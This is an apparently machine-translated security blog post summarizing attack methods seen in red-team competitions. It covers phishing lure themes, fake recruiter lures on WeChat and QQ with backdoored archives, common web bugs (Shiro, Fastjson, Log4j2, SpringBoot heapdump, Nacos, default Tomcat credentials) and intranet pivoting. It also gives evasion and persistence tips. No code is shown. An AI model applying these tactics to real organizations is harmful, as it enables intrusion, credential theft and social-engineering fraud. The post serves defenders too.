Preface
Hello everyone, my name is ABC_123 . Some time ago, I spent time and energy summarizing the types of web vulnerabilities that are more common in offensive and defensive competitions in the past two or three years. I also summarized the subject types of phishing emails. I share it today, I believe that both the attacker and the defender can get some inspiration from it (some small offensive and defensive games, prefecture-level * offensive and defensive games, because they can be successfully solved using various conventional loopholes, they are not included in the following statistical range for the time being) Inside).
The main sources of information include the following: 1. Experience accumulated in previous offensive and defensive competitions; 2. Experience in identifying vulnerabilities as a referee; 3. Discussions among friends and colleagues; 4. Others. Next, I will tell you about the common R&D vulnerabilities that have been exploited by red team members in recent years by category. I hope it can help red team members sort them out and provide targeted protection for blue team members .
Part1 Super 0day and supply chain 0day
For some extremely difficult goals, many can only be achieved by these two methods. Super 0day refers to vulnerabilities that can be fatal with one hit, have a large impact and are not easily discovered by network security equipment, including multiple buffer overflow vulnerabilities in a certain VPN, arbitrary account addition vulnerabilities in a certain VPN, command execution in a certain chat software, Virtual machine escape 0day, office software vulnerabilities, browser-level remote overflow, etc. We wo n’t discuss much about this kind of super 0day here. For most red team members, it is hard to find. This level of 0day vulnerability is basically a nuclear weapon. Other technologies and tactics related to external network management are insignificant in front of it .
0day vulnerabilities in the supply chain are also very harmful and difficult to protect against. The reason is: many companies have very large business volume and assets, and it is difficult to sort out the supply chain assets completely, even if they miss a single point. However, the red team members can randomly select a supply chain asset for code auditing and vulnerability mining. Generally speaking, the difficulty is not small for both sides, so offense and defense are always relative.
Part2 Social Worker Fishing
email phishing
By the way, let’s mention the topic of email phishing, which is also one of the methods of external management. I have summarized that the subject matter of email phishing roughly includes the following six categories. ABC_123 will have the energy to break it down further in the future.
Work-themed resume, self-recommendation letter, employee regularization application, cooperation details are attached, and business license application is filed.
Complaint-type topics include complaints about illegal charging of various fees, complaints and suggestions for a certain matter, notification of non-compliance responsibilities, complaints about publicity not meeting expectations, announcements about serious dereliction of duty, and complaints about excessive collection of user information.
Welfare-themed salary adjustment notices, welfare deception, Mid-Autumn Festival mooncake collection notices, holiday award collection notices, holiday benefit notices, summer high temperature allowances, summer work uniform collection, and salary structure adjustments.
Security-themed phishing email protection notifications, security vulnerability patch upgrades, internal data sharing of attack and defense drills, defender contact information notifications, and major vulnerability inspection notifications.
Notice-themed mailbox quota upgrades, express delivery pending orders, sixteen work guidelines, capacity improvement special training notices, epidemic prevention and control work arrangements, annual personal income tax settlement and settlement, learning to strengthen education, and canteen recipe research notices.
Popular topics such as the World Cup and the epidemic are probably something everyone can think of.
Add friends on WeChat
Members of the red team usually maintain several accounts, and many of these accounts use beautiful women's avatars, and their WeChat Moments will regularly post some life updates . The red team members first obtained the mobile phone numbers of employees of the target unit through various information collection on the Internet, and then added friends through WeChat, falsely claiming to be the HR of a large company, and sent a compressed package with an internal recruitment theme for a position with an annual salary of one million. , which is actually a backdoor program. There are many successful cases of this method, so everyone should pay attention to precautions .
Join qq group
Red team members will use various searches to find QQ groups that some employees of the target company have created themselves in the form of groups or departments. They will falsely claim that they are new employees, or have been asked to join the group by a certain leader, or install security check tools, etc. . Once you join the group, you will send a compressed package with a backdoor in the QQ group, which will basically get bigger results. In addition, you will also search for some sensitive documents, address book lists, etc. in the QQ group sharing. Many times, you will find them in the QQ group. Some account passwords for internal systems were found in the QQ group. Everyone should pay attention to precautions .
Maimai job search + WeChat chat combination
Red team members went to job search platforms such as Maimai to locate operation and maintenance technicians and other personnel of the target unit, falsely claimed that they were senior executives of Alibaba, Tencent, and Huawei, and conducted targeted recruitment with an annual salary of one million, and then induced them to chat on WeChat and send phishing emails. Trojan compressed package. I was surprised to find that there are so many successful cases like this, and everyone should pay attention to precautions .
Part3 Web Vulnerabilities
Sensitive information leaked
I put it first because I hope it can attract everyone's attention. Some units have been attacked several times, but I didn't expect that these information leakage problems would still exist. Here are some cases for your reference.
Case 1 : A JSON document directly from the official website, which directly contains the clear text account password of Mssql, and the IP address is from the external network.
Case 2 : Using burpsuite to capture packets, the AK/SK of a certain cloud exists in the js source code.
Case 3 : Unpack the apk, decompile the Java code and find the AK/SK of a certain cloud.
Case 4 : Directly extract information from apk in batches, and found a lot of unsophisticated IP+port assets.
Case 5 : There will be some unexpected assets in the website's documentation, and conventional vulnerabilities such as shiro deserialization and log4j2 can be used to penetrate them.
Case 6 : In the software package linked to the official website, the configuration file contains the Socks5 proxy, which is directly connected to the intranet.
Case 7 : SVN and other source code leak vulnerabilities, upload the vulnerability through PHP code audit.
Shiro Deserialization Vulnerability
I'm still surprised that this vulnerability has existed for so many years, as there have been many success stories in recent years. However, Shiro deserialization vulnerabilities are very rare to see in first-level units or second-level domain name assets. They are mainly concentrated in edge assets of level 2 units, assets of level 3 and 4 units, as well as public accounts, mini programs and other assets. Among them , Shiro's keys are all common keys. I personally feel that a list of more than 100 common keys is enough.
In addition, for the exploitation of this vulnerability, several reports have posted uncommon shiro keys that are difficult to see, but I speculate that the shiro keys should be extracted from springboot's heapdump and then exploited. For the exploitation of this vulnerability, remember to change the shiro key so that the permissions can be maintained longer.
OA system vulnerabilities
Later, I summarized that these OA systems mainly include a certain far oa, a certain micro OA, a certain household oa, Fanruan, a certain comprehensive security system, a certain micro mobile platform vulnerability, a certain emobile, a certain Ling OA, a certain friend cloud, a certain friend nc , a certain OA system, a certain channel, etc., their nday vulnerabilities can also be encountered in the edge assets of level 2 units and level 3 and 4 units. Unless the main assets of level 1 and level 2 units have 0day, it will be difficult to successfully exploit them .
Fastjson vulnerability
There are still many such nday old holes, especially in the WeChat public account and mini program assets of the target assets . You can try it for json data packets. For versions before 1.2.47, the utilization is very simple, and echo can also be implemented; for versions before 1.2.68, the utilization methods are mostly focused on the idea of fake mysql, and there are a few successful cases of writing shells; for 1.2.68 to 1.2 Although the .80 version of fastjson has loopholes, I have not seen anyone successfully use it in actual combat. However, I do not rule out that some big guys have internal tricks, so it is necessary to upgrade to the latest version.
For Jackson deserialization, the utilization conditions are too harsh and there are very few successful cases, so when I see Jackson, I usually give up.
Log4j2 vulnerability
For this nday vulnerability, like the fastjson vulnerability, most of them are discovered using the passive scanning plug-in of burpsuite, and they pop up out of nowhere. When scanning this vulnerability, remember not to use the common dnslog , because the characteristics are too obvious. Mainstream WAF or traffic monitoring equipment has added the commonly used dnslog to the blacklist. It is best to build one anonymously by yourself, which is why the same The reason why log4j2 vulnerabilities can be discovered by others but not by myself.
Springboot framework vulnerability
Regarding the utilization of SpringBoot vulnerabilities, there are many successful cases of using /actuator/env and heapdump. It not only depends on the root directory, but also on the subdirectories , and whether there are relevant url routes in the /api/ directory. For some websites, each subdirectory is actually mapped to a different server application on the back end. Various account passwords can be extracted from heapdump, and there are many cases where a certain cloud AK/SK is found. Then I also saw the use of spring cloud gateway . At first, I thought the possibility of encountering this vulnerability in actual combat was too small, but it does exist in actual combat, and I have seen several successful cases.
Nacos series of vulnerabilities
This kind of vulnerability is the same as the SpringBoot interface vulnerability. There are surprisingly many successful exploitation cases. It also has to look at the root directory and the secondary directory . The main exploitation methods of the red team members are nacos weak passwords, nacos adding account vulnerabilities, etc., and enter the nacos backend. After that, you will find the account password of the database. If you encounter Mssql or Oracle, you can basically get server permissions. Sometimes you will find the AK/SK of a certain cloud platform and get a lot of server permissions.
Weblogic vulnerability
The use of Weblogic vulnerabilities has been greatly reduced compared to previous years. This also surprised me . I have studied the echo of these vulnerabilities, memory horse writing, etc., and spent a lot of energy, but I can always encounter weblogic. Deserialization, I think the reasons for the reduced frequency of weblogic vulnerabilities may be the following:
1. It is difficult to obtain permissions for the subsequent use of new Weblogic vulnerabilities without going online;
2. It is very troublesome to exploit subsequent vulnerabilities in Weblogic (such as the series of vulnerabilities in the coherence library that began to appear in cve-2020-2555). It is very troublesome to solve the compatibility of the coherence library , and it is difficult to take into account both at the tool level;
3. Some of Webloigc's exploit EXP may be different in jdk1.5, jdk1.6, jdk1.7, jdk1.8 and other environments, but the final exploitation tool can only be compiled under one version of jdk , so there are It is difficult to balance both times, because they are self-contradictory, resulting in unsuccessful utilization.
4. The firewall or waf directly intercepts the T3 and IIOP protocols, but sometimes it only intercepts T3 and the IIOP protocol is still allowed. You can try it sometimes. Of course, the blue team must also remember to take precautions.
5. The T3 protocol adds a filter, which restricts the whitelist and cannot be used.
Ueditor upload vulnerability
There are many vulnerabilities. Most of the exploits focus on the getshell vulnerability caused by SSRF. You must also look at the root directory and secondary directory . Some js source codes will have ueditor directory records. You can try this vulnerability.
SQL injection vulnerability
This vulnerability appears more frequently in external network assets than I thought. Nowadays, many people are unwilling to look for SQL injection vulnerabilities. However, I have exchanged experiences and found that there are still a large number of edge assets in level 2 units and level 3 and 4 units . If If you discover a SQL injection vulnerability, if you are lucky enough to encounter a large target, the harm will be very serious; if you encounter Mssql and Oracle, you can escalate your privileges to obtain server permissions. Of course, if you encounter a cloud system, you should use other methods as a last resort. After all, the cost of sql injection to circumvent cloud waf is too high. If you have the energy, it is better to find other entrances . Therefore, everyone should still pay attention to prevention of SQL injection vulnerabilities.
Tomcat vulnerability
Among the side assets of subsidiaries of multiple units, there is actually a weak tomcat password tomcat: tomcat. This is something I did not expect. I have seen several successful cases like this. I took a closer look, and the common feature of these successful cases is that the ports are not the common port 8080. It is speculated that the red team members performed full port scanning and service identification on each IP . In addition, there are successful cases of tomcat AJP protocol obtaining webshell.
Struts2 series vulnerabilities
Nowadays, fewer and fewer website applications use the Struts2 framework, but it can still be seen, and there are several successful cases on the Internet. In the lateral process of the intranet, it has played a greater value than before, and it seems to have become a vulnerability for intranet lateral exploitation .
Various upload vulnerabilities
There are still many successful cases of administrator account password + background upload shell, and they are very typical. I won’t go into details here. I believe everyone is familiar with it.
Various weak password vulnerabilities
sentinel weak password, mysql 3306 weak password, but I have never seen a weak password for SQL Server on the external network (the reason is speculated that if there is a weak password, it has long been patronized by those chicken hunting teams on the external network), phpmyadmin weak Password, administrator's weak password (if you can see the address book in the background, it is also valuable), druid obtains the session without authorization, and logs in to the background to obtain data.
Logic vulnerability/override of authority vulnerability
Official accounts and mini programs will also have some business logic vulnerabilities, such as common order traversal and user identity traversal, which are also very serious. Some security vendors may not have their own red team members, but they still participate in offensive and defensive competitions. Their main focus is on discovering business logic vulnerabilities , but sometimes they also receive miraculous results, such as user information traversal vulnerabilities, which result in many rows. The harm is also great. Decrypting the js encryption algorithm of mini programs or other encrypted pages will uncover high-value business logic vulnerabilities.
Other vulnerabilities
There are successful cases for the following vulnerabilities, but they are very rare. Sunflower RCE vulnerability (very common high port), Jboss deserialization, ewebeditor upload vulnerability, dubbo high port deserialization vulnerability, RMI port deserialization vulnerability, nexus cve-2019-7238 vulnerability, etc., xxl-job starts from Find the password on the internal network and go to the external network to get permissions. In addition, there are some loopholes in network equipment, so I won’t list them one by one.
Part4 Intranet
I will write an article to focus on this part later when I have time. In this issue, I will briefly introduce it:
1. The number of exploits targeting VMware Vcenter and other vulnerabilities has increased significantly. Many red team members like to use this vulnerability to exploit machines on the intranet, that is, to exploit cloud platforms.
2. When searching for domain control, you can see that many were captured using the Zerologon vulnerability. Of course, it is not ruled out that the domain control may have been captured through other means, but when writing the report, it was mistakenly written as the Zerologon vulnerability.
3. After getting the webshell or database, double the AK/SK of a certain cloud, etc., and you will have unexpected gains.
4. Regarding the industrial control system, I have to admit that some red team members have very strong intranet lateral capabilities. Judging from the text description, they are just going for the industrial control goal, jumping from one network segment to another. With each lateral step , Everyone knows where they are on the intranet, and a clear intranet topology map is gradually formed in their minds .
Some red team members also took down the industrial control system by scanning the weak passwords of various services on the intranet, calling several servers through MS17-010, extracting common passwords or hash values, and then snowballing and scanning in batches. A large-scale scan of the intranet discovered the web management interface of industrial control, etc., and accidentally entered the industrial control section. This is actually a method .
5. After getting the database or domain control server in the intranet, don’t forget to use the same account and password. Try the unified authentication system of the external network. You will often have unexpected gains , and sometimes you will be directly connected to VPN and other systems. Therefore, it is necessary to strengthen the protection of the unified authentication system for external networks.
The public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit, etc. One article per week, 99% original, so stay tuned.
Contact me: 0day123abc#gmail.com(replace # with @)